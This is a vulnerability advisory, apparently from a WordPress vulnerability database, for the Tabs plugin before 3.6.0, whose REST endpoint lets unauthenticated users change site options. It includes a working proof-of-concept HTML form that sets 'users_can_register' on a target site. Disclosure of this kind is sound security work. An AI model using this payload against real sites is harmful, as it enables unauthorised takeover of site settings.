Tabs < 3.6.0 – Unauthenticated Arbitrary Option Update | Plugin Vulnerabilities

Description

The plugin does not have any authorisation in its REST API endpoint, one of them could allow unauthenticated attackers to update arbitrary blog options.

Proof of Concept

<html>
 <body>
 	<form action="https://example.com/wp-json/oxilabtabsultimate/v1/oxi_settings" method="POST">
		<input type="text" name="rawdata" id="rawdata" value='{"name":"users_can_register","value":"1"}'>
 		<input type="submit">
 	</form>
 </body>
</html>

Affects Plugins

Fixed in 3.6.0

References

URL

https://plugins.trac.wordpress.org/changeset/2642008

URL

https://plugins.trac.wordpress.org/changeset/2642582

Classification

Type

NO AUTHORISATION

OWASP top 10

A5: Broken Access Control

CWE

CVSS

10.0 (critical)

Miscellaneous

Original Researcher

Antony

Submitter

WP Charged

Submitter website

https://wpcharged.nz

Verified

Yes

WPVDB ID

fcc471c3-9e3d-42cb-8a59-4bf1c9d9c81b

Timeline

Publicly Published

2021-12-20 (about 4 years ago)

Added

2021-12-20 (about 4 years ago)

Last Updated

2021-12-20 (about 4 years ago)

Other

Published

Title

Published

2024-03-11

Title

Mollie Forms < 2.6.4 - Missing Authorization to Arbitrary Post Duplication

Published

2025-01-06

Title

Aurum - WordPress & WooCommerce Shopping Theme < 4.0.3 - Missing Authorization to Authenticated (Subscriber+) Demo Content Import

Published

2024-04-29

Title

WidgetKit < 2.5.5 - Missing Authorization to Notice Dismissal

Published

2025-08-07

Title

SMM API <= 6.0.31 - Missing Authorization

Published

2022-10-24

Title

SearchWP < 4.2.6 - Subscriber+ Settings Update